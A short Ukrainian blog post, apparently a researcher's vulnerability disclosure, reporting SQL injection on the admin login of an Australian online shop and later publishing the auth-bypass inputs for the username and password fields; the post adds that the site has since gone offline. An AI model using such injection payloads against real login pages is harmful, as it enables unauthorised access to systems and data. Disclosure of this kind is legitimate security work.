Уразливості на www.vilmorin.com.au
16:08 27.09.201008.02.2010
У травні, 24.05.2009, я знайшов SQL Injection уразливості на сайті http://www.vilmorin.com.au (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на rozetka.com.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
27.09.2010
SQL Injection (Auth Bypass):
На сторінці http://www.vilmorin.com.au/admin/
admin’ or 1=’1
В полі username.
‘ or ‘1′=’1
В полі password.
Зараз сайт не працює. Схоже, що замість виправлення дірок, власники сайта вірішили його закрити.